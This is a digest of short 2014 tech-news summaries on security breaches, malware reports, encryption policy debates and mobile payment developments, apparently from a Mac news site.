System blocking Google, Apple efforts; allows others to pass through
CVS has ceased accepting Near-Field Communication (NFC) payments from Apple Pay and Google Wallet at its stores, US-wide. The pharmacy issued the instructions to stores earlier this week, with shutdowns continuing through the weekend. CVS has mirrored Rite Aid, which shut down its terminals earlier this week. Both CVS and Rite Aid are about to join the nascent and poorly-regarded MCX CurrentC NFC and barcode payment solution, and the move is widely seen as an effort to squeeze out both Google's and Apple's payment solutions.
CryptoWall 2.0 ransomware discovered being pushed by malicious advertisements
A new ransomware attack has been taking place, infecting victims by spreading malware via advertising networks on major sites, a report claims. Appearing on a number of high-profile websites, the malicious advertising pushed the CryptoWall 2.0 ransomware using Flash exploits, encrypting the victim's local storage and demanding a fee to decrypt it before a payment deadline elapses.
Effort still in earliest stages
For Apple, getting Apple Pay working in China is a major priority, CEO Tim Cook tells China's state-run Xinhua news agency. "China is a really key market for us," he says. "Everything we do, we are going to work it here. Apple Pay is on the top of the list." He adds, however, that the company still has to learn the steps needed to bring Apple Pay to China, and has yet to meet with local banks, merchants, and carriers.
Unknown author calls Knox compromised, unsafe for use
Reports have begun to circulate about a pervasive flaw in Samsung's Knox security software for Android phones. The technology, which is the foundation of Android 5.0 Lollipop's enhanced protections, has come under fire by a lone, previously-unknown researcher, who calls the effort merely "security by obscurity."
Will use transport layer security for push notifications starting October 29
In a note to developers, Apple has announced that due to a serious security flaw in SSL version 3.0, the company will be dropping support for the protocol beginning Wednesday, October 29 for all of its push notifications, which are delivered through Apple's own servers. The company will switch to Transport Layer Security (TLS) for the service, and notes that developers will need to build in support for TLS in their apps to ensure uninterrupted push notification compatibility if they haven't already.
CEO as already met with Vice Premier Ma Kai over China iCloud attacks
Apple CEO Tim Cook has posted a picture from his latest trip to China on Twitter, showing him sharing a laugh with a factory worker named Zhang Fan, who helps assemble the iPhone 6 at a factory in Zhengzhou. While Foxconn's factories manufacture equipment for a wide variety of technology firms including Google, Microsoft and others, Cook is the only CEO to routinely visit the facilities and personally investigate conditions and safety at the plants. He called the meeting with Zhang "an early highlight" of the trip.
Comey seeking update to CALEA to give law enforcement a 'front door' into devices
Federal Bureau of Investigation (FBI) Director James Comey isn't giving up his crusade to persuade the government and businesses that law enforcement should have access to encrypted phone data. Comey took his fight to Congress recently, asking that it update the Communications Assistance for Law Enforcement Act (CALEA) to cover newer technologies.
Mac will have to wait for key features
Avast Software has launched Avast 2015, an update of its multi-platform security suite. The main addition this year is a tool called Home Network Security, which scans a local network for potential vulnerabilities. These may include things like weak or default router passwords, unprotected IPv6 use, and already-compromised Internet connections. A related new feature is called SecureDNS, which offers encrypted traffic between a computer and an Avast-operated DNS server, reducing the chance of DNS hijacking.
Chinese government so far denying involvement
Apple CEO Tim Cook met with China's Vice Premier Ma Kai in Beijing on Wednesday to discuss man-in-the-middle attacks against iCloud users, according to Reuters and China's state-run Xinhua news agency. Reuters notes that the Chinese government has so far denied allegations of involvement, which in particular tied the attacks to the state firewall used to censor Internet access in the country. As for the meeting, Xinhua says only that the pair shared views on "protection of users' information" and "strengthening cooperation and in information and communication fields."
Involvement of Chinese government uncertain
Apple is aware of "intermittent organized network attacks" against people trying to sign into iCloud.com, says Dow Jones. It insists, however, that iCloud servers haven't been breached, and that people using iOS or the latest version of OS X -- Yosemite -- should be unaffected. The company doesn't specifically mention China, which is where the browser hijacks are taking place.
USB drives with FIDO U2F support can be used to secure Google accounts
Google is giving users of its services an extra security option, on top of its existing procedures and protocols, with a physical token. The search company's "Security Key" is allowing for users to nominate a USB drive to allow access to the Google account when it is plugged into a computer's USB port, as an alternative to the two-step verification process.
Unknown number of victims, data taken from PA, NY, NJ
Office supply store Staples appears to be the latest victim of a breach of customer payment information. The company issued a brief statement saying that they were looking into the matter, after several banks reported fraudulent activity with a pattern pointing to the source being Staples stores in the northeastern US.
Emphasizes user privacy through short-lived session IDs
While it may sound like a report from the Department of the Obvious, the new version of Spotlight included in Yosemite includes searching beyond the local drive, and consequently gathers and sends to Apple some information on what users are searching for, their (city-level) location -- if Location Services is turned on -- and what Spotlight Suggestion was selected. That one needs to get certain data to perform a web search has apparently come as a surprise to some, and thus Apple has released a statement clarifying exactly what data is gathered, how it is used, and reminding users of how to turn it off if desired.
Functions raise privacy concerns
The Yosemite version of Spotlight is automatically uploading both location and search data to Apple whenever the tools is used, reports say. The information is mentioned in an official "About Spotlight & Privacy" document, but may be missed by the average person. "If you have Location Services on your device turned on, when you make a search query to Spotlight the location of your device at that time will be sent to Apple," one part of the document reads.
Initiative adds EMV support to government channels, more identity theft protections, reporting
Last week US President Barack Obama signed an executive order that will help consumers that a victims of identity theft, as well as speed up the adoption of the Europay, MasterCard, and Visa (EMV) chip standard for credit and debit cards. In the executive order signed by the president, parts of the federal government will be adopting EMV measures, as well as strengthening the public's ability to monitor financial health or seek help when necessary.
Users being redirected to dummy sites
China's state firewall is currently hijacking attempts to visit iCloud.com or Microsoft's login gateway, login.live.com, redirecting people to dummy websites, reports say. People visiting iCloud.com through Firefox or Chrome will see a warning page, but visitors with Qihoo -- the most popular browser in China -- are being forwarded directly to a dummy site with no obvious signs it isn't Apple's. It's believed that the Chinese government may be trying to harvest iCloud and Microsoft logins.
Zwipe, MasterCard team up to combine fingerprint authentication, contactless payments
At a press event last week, MasterCard and Zwipe announced a new type of payment card dubbed the Zwipe MasterCard. Where the new card is different from the the standard credit or debit card is in the payment process, looking to biometrics to approve purchases. The Zwipe MasterCard uses authentication via fingerprint for MasterCard contactless payment terminals, while retaining Europay, MasterCard and Visa (EMV) chips on cards.
Hardware appeared to be sourced from Alibaba, software straight OpenWRT
Following allegations casting doubt on the project, the TOR-based Anonabox Kickstarter project has been terminated. Since the launch of the security-minded Anonabox, and nearly instant completion of funding goals, commenters and other figures questioned the source of the hardware, the actual security of the device, and criticized the lack of a promised and complete open-sourcing of the code.
Wi-Fi sync starts automatically once iOS devices are in range
AgileBits has released v5.0 of its password and credit card manager for the Mac, 1Password. The software has been redesigned to match the look of OS X Yosemite, including support for the OS' new dark mode. AgileBits is also exploiting changes to iCloud for "faster and more robust syncing;" the company warns, though, that iCloud sync now requires v5.0 on both iOS and OS X.
Encryption of smartphones hampers security efforts, claims FBI head
The head of the Federal Bureau of Investigation (FBI) has asked for companies to back away from encrypting consumer devices by default. Echoing similar comments made last month, Director James Comey spoke to the Brookings Institute yesterday about the issue, which is claimed will make it difficult for law enforcement officials to collect evidence from mobile devices.
Microsoft Office for Mac 2011 receives security update
Microsoft released a security update for its Office for Mac 2011 software the latest release being v14.4.5. Resolving vulnerabilities, the update prevents the possibility of remote code execution if a specially crafted file is opened in an affected version. Attackers could gain the same user rights as the current user if successful, and subsequently install programs, view, change or delete data; or create new accounts with full user rights. Full details can be found in Mircosoft's latest security bulletin on the matter.
Reddit users suggest Anonabox created from existing routers sold in China
A Kickstarter campaign for a privacy-focused Wi-Fi router has drawn the ire of some Internet users, with the suggestion that all may not be as it seems. Reddit users are complaining about the Anonabox Tor router's claimed "open hardware," with components apparently being sourced from Chinese resellers rather than being designed specifically for the project.
Apple pitching tech to advertisers as an alternative to cookies
Something quietly introduced alongside iOS 8 has been the ability for advertisers to retarget iAds based on in-app browsing actions, a new report says. Apple is, in fact, said to be pitching this to advertisers as a way of circumventing the absence of mobile cookie tracking in iOS. In a given example, someone who adds a pair of shoes to a cart in a retailer's iPhone shopping app -- but decides not to buy them -- may later see an ad for that same pair of shoes from the same retailer, even in another app on his or her iPad. Tapping that ad might redirect the person to their abandoned checkout page and add the shoes back to it.
SSL 3.0 design flaw allows attackers to view contents of encrypted web traffic
Another Secure Sockets Layer (SSL) vulnerability has been discovered by Google, just six months after HeartBleed was first unveiled. Padding Oracle on Downloaded Legacy Encryption ("Poodle") is an issue affecting SSL 3.0, though researchers claim the issue this time is less severe than HeartBleed, despite potentially affecting nearly all browsers and a large number of servers.
Kickstarter campaign for Anonabox vastly exceeds target in first day
Welcome to another edition of Crowdfunding Critic, an article series where the staff of MacNN and Electronista will highlight a new crowdfunded project from sites such as Kickstarter and Indiegogo, with this edition focusing on the popular Anonabox. As always, we are not endorsing a project or warning of any potential funding risks associated with crowdfunded projects, so it is advisable to do your own research before investing.
Third party services likely to blame for Dropbox account leak
Passwords from a supposed pool of 7 million Dropbox accounts have allegedly leaked by hackers, though Dropbox denies its service has been hacked. A thread on Reddit linked to batches of account credentials, with the user hoping to receive Bitcoin donations for the leaks, though the exact source of the leaked account details is unknown.
Kmart offering identity theft protection, credit monitoring
Sears-owned retailer Kmart has declared that it has suffered a massive data breach. The company said late Friday that a malware attack that began harvesting data from it its point-of-sale computer systems in early September was "new form of malware" and "similar to a computer virus." Few details have been released by Kmart, but the company warns that it could include every shopper between September 1 and Thursday, October 9. Online shoppers were not impacted by the breach.
August infection subjects customers of 395 stores to data theft
Restaurant chain Dairy Queen has confirmed that 395 of its 4,500 US locations have been affected by the "Backoff" malware, which has in turn, compromised customer's credit card information. Restaurants in 46 states were affected, with customers in Hawaii, Louisiana, Rhode Island and Vermont escaping the malware.
Breach from either Android app or third party web tool SnapSaved
Some supposedly ephemeral messages sent through the SnapChat service have been leaked to the Internet. Private photos collected for years through the either the SnapChat archiving Android app Snapsave or the shuttered SnapChat web client SnapSaved have been stolen, and posted en masse to chat forum 4chan, and other similar locations.
Two publicly traded companies will emerge in areas of security, information management
Rumors of Symantec's possible company split look to be true, as the company announced today that a plan was voted on to break the company up. The company, which is known for its line of Norton security products, said that its board of directors unanimously approved a new plan that would create two publicly traded companies, each with their own focus.
Information on ePubs sent in plain text over unencrypted channels to Adobe servers
If Adobe didn't enough problems with its reputation for security because of the frequency of the company's products being used for attack vectors, then the claim that the company collects detailed, personal data through Digital Editions 4 will undoubtedly further alienate some customers. The program, which is used to enforce digital rights management on borrowed books from libraries or other online avenues, is reporting details on the use of the ePub files back to Adobe - and is unencrypted, inviting further privacy and security issues.
List of affected Belkin devices, cause of incident both unknown
Some of accessory manufacturer Belkin's router customers are experiencing connectivity issues, predominantly with older models. For reasons unknown, possibly due to a silent, automatic firmware update, some Belkin networking products are refusing connection to the Internet, but maintaining local area network connectivity. Some models can be restored by pointing Domain Name Services to Google's or other providers' services.
Letter to Vermont attorney general advises of August intrusion
AT&T has admitted that it has suffered a data breach, and is warning customers about the intrusion. The communications provider has written to the Vermont attorney general about the breach, which took place in August, though unlike similar breaches at Home Depot, Target, and itself, this was instigated by an employee rather than an outside force.
Latest 1Password improves Touch ID support, adds iPhone 6 Plus support
A new version of password manager 1Password has been released for the iPhone and iPad, offering support for the iPhone 6 and iPhone 6 Plus in the form of 3x higher resolution images and improved icons. The update also improves Touch ID support to be more reliable, and simplifies the app's security settings. A new option has been added to disable third-party keyboards inside the 1Password app (since theoretically such keyboard could transmit keystrokes), and users can now create tags to help sort data. The app itself is free, but a "pro" in-app purchase to unlock additional features costs $10.
Should halt further infections
Apple has issued a silent update to Xprotect, the anti-malware system in OS X, to detect and block the inaccurately-named "iWorm" trojan uncovered last week. The new definitions actually mention three variants, identified as "OSX.iWorm.A," "OSX.iWorm.B," and "OSX.iWorm.C." It's not clear what the differences between them might be.
Search engine has scrubbed 'tens of thousands' of links to stolen photos
Google has responded to the letter threatening legal action should Google not purge the Internet of stolen, and sometimes intimate, photos of celebrities. The search engine has denied that it is intentionally profiting on the scandal, and instead has acted quickly and appropriately to takedown requests by removing "tens of thousands" of images from Google search results.
Scope of theft makes consumer protection agencies wary of uptick in phishing
Despite JP Morgan Chase claiming that it isn't seeing enhanced fraud activity, two states have launched an investigation of the event that caused the reveal of 76 million household's information, with the promise of more to come. A recent regulatory filing showed the leak, with customers' names, addresses, phone numbers, and email addresses stolen -- the bank, however, claims no financial information was stolen.
iOS and 'free-to-play' game blamed
A 15-year-old from Antwerp, Belgium has managed to accumulate over 37,000 euro ($46,000) in iTunes charges on a credit card through in-app purchases, according to local publication Nieuwsblad. The teenager was reportedly playing a free-to-play iOS game called Game of War: Fire Age; several months in, his mother asked him to buy some e-books using her credit card. The boy then discovered he could buy virtual gold in-game using real money, greatly accelerating his progress. The title even has a casino minigame.
Formerly used Reddit as go between to steal user data
[Updated with corrected information and further details] A new Trojan threat, possibly disguised as a fake unauthorized build of OS X 10.10 Yosemite, is making the rounds by taking in users who attempt to pirate software. The new malware, dubbed "iWorm" by Russian research firm "Dr. Web," has supposedly been installed by duped users on over 17,000 unique IP addresses worldwide thus far. Users would have had to have downloaded and installed the software in order to be victimized by the Trojan, which is mostly aimed at gathering user data.
Google chairman defends company against implied Tim Cook remarks
Google chairman Eric Schmidt has fought back against comments over the company's security and privacy, following comments laid out by Apple CEO Tim Cook. In an interview which touched upon a recent open letter about privacy from Cook, Schmidt claims "Someone didn't brief [Cook] correctly on Google's policies. It's unfortunate for him."
Number of people affected revealed more than three months after breach discovered
A filing made with the United States Securities and Exchange Commission (SEC) Thursday revealed new information on the scope of the breach that JPMorgan Chase witnessed earlier in the summer. In July the company, along with at least four other financial institutions, discovered an attack by hackers that reportedly resulted in gigabytes of data stolen after they gained high-level access to 90 of JPMorgan Chase's servers worldwide.
Tests reveal keylogger information unencrypted when sent, 'software is unreliable'
A program that is touted as the first step in Internet security for children was examined by the Electronic Frontier Foundation (EFF), only to discover that the software isn't very safe itself. ComputerCop, which the EFF says is distributed by approximately 245 agencies involved in law enforcement in 35 states, is nothing more than branded spyware that is unreliable and sends unencrypted key logs, the foundation says.
Proposals for Facebook research to undergo more stringent reviews
Facebook has admitted fault over its handling of user-based research, a matter which erupted this summer, and is taking steps to prevent such incidents from happening again. The social network is putting in place measures that it hopes will place a greater degree of scrutiny on future research projects, at the time of proposal, and at the time of publication.
Pair of researchers engineer hack, post code to shame companies into action
Security researchers Adam Caudill and Brandon Wilson have published source code for a theoretically-unpatchable USB firmware bug called "BadUSB." First revealed at at the Black Hat security conference in July, the two researchers who reverse-engineered the original finding say that they published for the public good, and "so people can defend against it." More severe exploits are possible using their method, but Caudill and Wilson are hesitant to release them, fearing more dangerous exploits.
Google+ now offering ability to restrict viewers based on age, location
Google's social network, Google+, has added a new privacy feature, allowing its users to limit who views their content based on age and location. The new section, found within Profile Settings, is called Audience; here, an age limit can be selected on content viewing, and users can also select what countries the content can be viewed from. Varying age restrictions can be chosen for each country if desired.
Malware entry vector not yet identified; may capitalize on jailbreak compromise
In an almost unheard-of claim, Lacoon Mobile Security has said that it has discovered a new spyware attack that targets both iOS and Android devices and which appears to be aimed specifically at Hong Kong pro-democracy protesters. Lacoon says it made the discovery while investigating the Android version, but did not clarify how the malware might be installed, or overcome the security built into iOS that has, thus far, kept it largely immune to serious malware or viruses.
Users can enter IMEI to learn more; technology is on by default in iOS 8
Users who are unsure if their iOS device has the anti-theft feature Activation Lock turned on can now easily check through a new page based on Apple's iCloud site. While the page is currently not linked to the main menu on iCloud.com -- suggesting it may still be undergoing testing -- it offers users a chance to input the devices serial number or IMEI identifier, and returns information on whether the device is protected.
New $15,000 award for successful submissions, up from $5,000.
Google is increasing the rewards in its bug bounties program, as it tries to make its software more secure. The search company is updating its reward pricing range to between $500 and $15,000 per bug, up from the previous maximum of $5,000 for a high-quality report, with an increased focus on discovering potential vulnerabilities within the Chrome browser.
Newest range of grocery store breaches spans 20 states
Supervalu and Albertson's shoppers may be in for another round of personal information theft notifications. The companies said that a second hack took place in late August or early September, with the company finding malicious software on systems that process credit and debit card sales at some of the company's 1,081 stores. Additionally, the malware was also found at Shoppers Food and Pharmacy, plus Shop 'n Save stores -- but the company believes that the installation was not successful, and failed to capture payment data.
Dueling regulatory boards fight over future of ISP regulation
Allegedly concerned about protecting the American consumer, US Federal Trade Commission (FTC) head Maureen Ohlhausen has come out as strongly against Federal Communications Commission (FCC) Chairman Tom Wheeler's net neutrality provision -- specifically, the possibility of Title II regulation of ISPs. The comment against the possibility of regulating Internet providers as a utility is the FTC's second in September.